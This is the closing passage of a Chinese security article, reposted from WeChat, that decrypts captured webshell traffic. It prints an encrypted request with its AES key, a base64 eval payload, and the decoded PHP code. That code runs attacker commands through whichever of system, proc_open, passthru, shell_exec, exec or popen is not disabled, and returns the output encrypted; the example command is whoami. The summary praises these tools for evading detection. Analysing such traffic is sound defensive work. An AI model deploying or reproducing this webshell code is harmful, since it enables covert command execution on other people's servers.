QKq5TZd0IIGEmxSJrrwel6r/gorqY0NTCE2i0yQ0MHxdgGQj6/ZA5+8Ani6/AMkeNF7DGeozFr53NycnWO6wFeXmoBeJ2w2Hmj0RVecPwU809v+hOxL45Tn6g9ZSSG7hFZJkUVjD0NO3u3hhcN65wbPsILHJZpTo/KiocBy2S1+j747iMfzKmgmqsBcI1y+Vx3C/5Km2rsaagSSxXQx1eqTF3Y07Aq4h5SJp5x3eHm50WCC2Iyh7Vb37+a9jrFu76U+1AiwMM8pYCLWIxrYbcU/wo2eLnpWlRnGEUrtijjdrwegXDCAiEqvhqp11DUU3KUy5UwfcPZeeMo5a5T32TVbWDX2eyMCNXMyx5UzCpspxh4Qj+SWgaXswoIab5Gx5rq7h8lJNL9P2/js0D7VgO1AwdeUI8RmsK1TygwQBGHu92S2/PR1YTzQ3dB5U9mwLM2nUxi0U0BrHI/4hh/Ilpw4msZNk69IlpXcfNyPvVFKxZaU=

ASE加密模式CBC,填充:okcs7padding,密钥长度:128位,密钥:a02439ec229d8be0:

Pssert|eval(base64_decode('QGVycm9yX3JlcG9ydGluZygwKTsNCg0KZnVuY3Rpb24gZ2V0U2FmZVN0cigkc3RyKXsNCiAgICAkczEgPSBpY29udigndXRmLTgnLCdnYmsvL0lHTk9SRScsJHN0cik7DQogICAgJHMwID0gaWNvbnYoJ2diaycsJ3V0Zi04Ly9JR05PUkUnLCRzMSk7DQogICAgaWYoJHMwID09ICRzdHIpew0KICAgICAgICByZXR1cm4gJHMwOw0KICAgIH1lbHNlew0KICAgICAgICByZXR1cm4gaWNvbnYoJ2diaycsJ3V0Zi04Ly9JR05PUkUnLCRzdHIpOw0KICAgIH0NCn0NCmZ1bmN0aW9uIG1haW4oJGNtZCwkcGF0aCkNCnsNCiAgICBAc2V0X3RpbWVfbGltaXQoMCk7DQogICAgQGlnbm9yZV91c2VyX2Fib3J0KDEpOw0KICAgIEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLCAwKTsNCiAgICAkcmVzdWx0ID0gYXJyYXkoKTsNCiAgICAkUGFkdEpuID0gQGluaV9nZXQoJ2Rpc2FibGVfZnVuY3Rpb25zJyk7DQogICAgaWYgKCEgZW1wdHkoJFBhZHRKbikpIHsNCiAgICAgICAgJFBhZHRKbiA9IHByZWdfcmVwbGFjZSgnL1ssIF0rLycsICcsJywgJFBhZHRKbik7DQogICAgICAgICRQYWR0Sm4gPSBleHBsb2RlKCcsJywgJFBhZHRKbik7DQogICAgICAgICRQYWR0Sm4gPSBhcnJheV9tYXAoJ3RyaW0nLCAkUGFkdEpuKTsNCiAgICB9IGVsc2Ugew0KICAgICAgICAkUGFkdEpuID0gYXJyYXkoKTsNCiAgICB9DQogICAgJGMgPSAkY21kOw0KICAgIGlmIChGQUxTRSAhPT0gc3RycG9zKHN0cnRvbG93ZXIoUEhQX09TKSwgJ3dpbicpKSB7DQogICAgICAgICRjID0gJGMgLiAiIDI+JjFcbiI7DQogICAgfQ0KICAgICRKdWVRREJIID0gJ2lzX2NhbGxhYmxlJzsNCiAgICAkQnZjZSA9ICdpbl9hcnJheSc7DQogICAgaWYgKCRKdWVRREJIKCdzeXN0ZW0nKSBhbmQgISAkQnZjZSgnc3lzdGVtJywgJFBhZHRKbikpIHsNCiAgICAgICAgb2Jfc3RhcnQoKTsNCiAgICAgICAgc3lzdGVtKCRjKTsNCiAgICAgICAgJGtXSlcgPSBvYl9nZXRfY29udGVudHMoKTsNCiAgICAgICAgb2JfZW5kX2NsZWFuKCk7DQogICAgfSBlbHNlIGlmICgkSnVlUURCSCgncHJvY19vcGVuJykgYW5kICEgJEJ2Y2UoJ3Byb2Nfb3BlbicsICRQYWR0Sm4pKSB7DQogICAgICAgICRoYW5kbGUgPSBwcm9jX29wZW4oJGMsIGFycmF5KA0KICAgICAgICAgICAgYXJyYXkoDQogICAgICAgICAgICAgICAgJ3BpcGUnLA0KICAgICAgICAgICAgICAgICdyJw0KICAgICAgICAgICAgKSwNCiAgICAgICAgICAgIGFycmF5KA0KICAgICAgICAgICAgICAgICdwaXBlJywNCiAgICAgICAgICAgICAgICAndycNCiAgICAgICAgICAgICksDQogICAgICAgICAgICBhcnJheSgNCiAgICAgICAgICAgICAgICAncGlwZScsDQogICAgICAgICAgICAgICAgJ3cnDQogICAgICAgICAgICApDQogICAgICAgICksICRwaXBlcyk7DQogICAgICAgICRrV0pXID0gTlVMTDsNCiAgICAgICAgd2hpbGUgKCEgZmVvZigkcGlwZXNbMV0pKSB7DQogICAgICAgICAgICAka1dKVyAuPSBmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0KICAgICAgICB9DQogICAgICAgIEBwcm9jX2Nsb3NlKCRoYW5kbGUpOw0KICAgIH0gZWxzZSBpZiAoJEp1ZVFEQkgoJ3Bhc3N0aHJ1JykgYW5kICEgJEJ2Y2UoJ3Bhc3N0aHJ1JywgJFBhZHRKbikpIHsNCiAgICAgICAgb2Jfc3RhcnQoKTsNCiAgICAgICAgcGFzc3RocnUoJGMpOw0KICAgICAgICAka1dKVyA9IG9iX2dldF9jb250ZW50cygpOw0KICAgICAgICBvYl9lbmRfY2xlYW4oKTsNCiAgICB9IGVsc2UgaWYgKCRKdWVRREJIKCdzaGVsbF9leGVjJykgYW5kICEgJEJ2Y2UoJ3NoZWxsX2V4ZWMnLCAkUGFkdEpuKSkgew0KICAgICAgICAka1dKVyA9IHNoZWxsX2V4ZWMoJGMpOw0KICAgIH0gZWxzZSBpZiAoJEp1ZVFEQkgoJ2V4ZWMnKSBhbmQgISAkQnZjZSgnZXhlYycsICRQYWR0Sm4pKSB7DQogICAgICAgICRrV0pXID0gYXJyYXkoKTsNCiAgICAgICAgZXhlYygkYywgJGtXSlcpOw0KICAgICAgICAka1dKVyA9IGpvaW4oY2hyKDEwKSwgJGtXSlcpIC4gY2hyKDEwKTsNCiAgICB9IGVsc2UgaWYgKCRKdWVRREJIKCdleGVjJykgYW5kICEgJEJ2Y2UoJ3BvcGVuJywgJFBhZHRKbikpIHsNCiAgICAgICAgJGZwID0gcG9wZW4oJGMsICdyJyk7DQogICAgICAgICRrV0pXID0gTlVMTDsNCiAgICAgICAgaWYgKGlzX3Jlc291cmNlKCRmcCkpIHsNCiAgICAgICAgICAgIHdoaWxlICghIGZlb2YoJGZwKSkgew0KICAgICAgICAgICAgICAgICRrV0pXIC49IGZyZWFkKCRmcCwgMTAyNCk7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICAgICAgQHBjbG9zZSgkZnApOw0KICAgIH0gZWxzZSB7DQogICAgICAgICRrV0pXID0gMDsNCiAgICAgICAgJHJlc3VsdFsic3RhdHVzIl0gPSBiYXNlNjRfZW5jb2RlKCJmYWlsIik7DQogICAgICAgICRyZXN1bHRbIm1zZyJdID0gYmFzZTY0X2VuY29kZSgibm9uZSBvZiBwcm9jX29wZW4vcGFzc3RocnUvc2hlbGxfZXhlYy9leGVjL2V4ZWMgaXMgYXZhaWxhYmxlIik7DQogICAgICAgICRrZXkgPSAkX1NFU1NJT05bJ2snXTsNCiAgICAgICAgZWNobyBlbmNyeXB0KGpzb25fZW5jb2RlKCRyZXN1bHQpLCAka2V5KTsNCiAgICAgICAgcmV0dXJuOw0KICAgICAgICANCiAgICB9DQogICAgJHJlc3VsdFsic3RhdHVzIl0gPSBiYXNlNjRfZW5jb2RlKCJzdWNjZXNzIik7DQogICAgJHJlc3VsdFsibXNnIl0gPSBiYXNlNjRfZW5jb2RlKGdldFNhZmVTdHIoJGtXSlcpKTsNCiAgICBlY2hvIGVuY3J5cHQoanNvbl9lbmNvZGUoJHJlc3VsdCksICAkX1NFU1NJT05bJ2snXSk7DQp9DQoNCmZ1bmN0aW9uIGVuY3J5cHQoJGRhdGEsJGtleSkNCnsNCglpZighZXh0ZW5zaW9uX2xvYWRlZCgnb3BlbnNzbCcpKQ0KICAgIAl7DQogICAgCQlmb3IoJGk9MDskaTxzdHJsZW4oJGRhdGEpOyRpKyspIHsNCiAgICAJCQkgJGRhdGFbJGldID0gJGRhdGFbJGldXiRrZXlbJGkrMSYxNV07IA0KICAgIAkJCX0NCgkJCXJldHVybiAkZGF0YTsNCiAgICAJfQ0KICAgIGVsc2UNCiAgICAJew0KICAgIAkJcmV0dXJuIG9wZW5zc2xfZW5jcnlwdCgkZGF0YSwgIkFFUzEyOCIsICRrZXkpOw0KICAgIAl9DQp9JGNtZD0iWTJRZ0wyUWdJa1E2WEhCb2NITjBkV1I1WDNCeWIxeFhWMWRjSWlaM2FHOWhiV2s9IjskY21kPWJhc2U2NF9kZWNvZGUoJGNtZCk7JHBhdGg9IlJEb3ZjR2h3YzNSMVpIbGZjSEp2TDFkWFZ5OD0iOyRwYXRoPWJhc2U2NF9kZWNvZGUoJHBhdGgpOw0KbWFpbigkY21kLCRwYXRoKTs='));

将内容base64解密:

@error_reporting(0);

function getSafeStr($str){
    $s1 = iconv('utf-8','gbk//IGNORE',$str);
    $s0 = iconv('gbk','utf-8//IGNORE',$s1);
    if($s0 == $str){
        return $s0;
    }else{
        return iconv('gbk','utf-8//IGNORE',$str);
    }
}
function main($cmd,$path)
{
    @set_time_limit(0);
    @ignore_user_abort(1);
    @ini_set('max_execution_time'0);
    $result = array();
    $PadtJn = @ini_get('disable_functions');
    if (! empty($PadtJn)) {
        $PadtJn = preg_replace('/[, ]+/'','$PadtJn);
        $PadtJn = explode(','$PadtJn);
        $PadtJn = array_map('trim'$PadtJn);
    } else {
        $PadtJn = array();
    }
    $c = $cmd;
    if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {
        $c = $c . " 2>&1\n";
    }
    $JueQDBH = 'is_callable';
    $Bvce = 'in_array';
    if ($JueQDBH('system'and ! $Bvce('system'$PadtJn)) {
        ob_start();
        system($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('proc_open'and ! $Bvce('proc_open'$PadtJn)) {
        $handle = proc_open($carray(
            array(
                'pipe',
                'r'
            ),
            array(
                'pipe',
                'w'
            ),
            array(
                'pipe',
                'w'
            )
        ), $pipes);
        $kWJW = NULL;
        while (! feof($pipes[1])) {
            $kWJW .= fread($pipes[1], 1024);
        }
        @proc_close($handle);
    } else if ($JueQDBH('passthru'and ! $Bvce('passthru'$PadtJn)) {
        ob_start();
        passthru($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('shell_exec'and ! $Bvce('shell_exec'$PadtJn)) {
        $kWJW = shell_exec($c);
    } else if ($JueQDBH('exec'and ! $Bvce('exec'$PadtJn)) {
        $kWJW = array();
        exec($c$kWJW);
        $kWJW = join(chr(10), $kWJW) . chr(10);
    } else if ($JueQDBH('exec'and ! $Bvce('popen'$PadtJn)) {
        $fp = popen($c'r');
        $kWJW = NULL;
        if (is_resource($fp)) {
            while (! feof($fp)) {
                $kWJW .= fread($fp1024);
            }
        }
        @pclose($fp);
    } else {
        $kWJW = 0;
        $result["status"] = base64_encode("fail");
        $result["msg"] = base64_encode("none of proc_open/passthru/shell_exec/exec/exec is available");
        $key = $_SESSION['k'];
        echo encrypt(json_encode($result), $key);
        return;
        
    }
    $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode(getSafeStr($kWJW));
    echo encrypt(json_encode($result),  $_SESSION['k']);
}

function encrypt($data,$key)
{
    if(!extension_loaded('openssl'))
        {
            for($i=0;$i<strlen($data);$i++) {
                 $data[$i] = $data[$i]^$key[$i+1&15]; 
                }
            return $data;
        }
    else
        {
            return openssl_encrypt($data"AES128"$key);
        }
}$cmd="Y2QgL2QgIkQ6XHBocHN0dWR5X3Byb1xXV1dcIiZ3aG9hbWk=";$cmd=base64_decode($cmd);$path="RDovcGhwc3R1ZHlfcHJvL1dXVy8=";$path=base64_decode($path);
main($cmd,$path);

而cmd内容即为执行内容:

cd /d "D:\phpstudy_pro\WWW\"&whoami

小小总结

这些webshell被大家所使用不仅仅是在当时出现时可绕过大部分流量检测,独特的请求方式,和免杀,还有他们与时俱进的各种功能,内网穿透、内存马等等,实现一键去日内网,随着检测手段加强和内网利用手段的增多,相信也会有新的绕过方法和功能出现。

https://www.freebuf.com/sectool/285693.html
https://xz.aliyun.com/t/10556
http://www.wjhsh.net/0daybug-p-12004574.html

文章来源: https://mp.weixin.qq.com/s?__biz=Mzg3NzczOTA3OQ==&mid=2247485690&idx=1&sn=560666783b064fa184117f29d406d471&chksm=cf1f25d2f868acc4b50bbd1a26d9c306245e070b66acc9ce829d99d31031ec6837a55a491a77&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh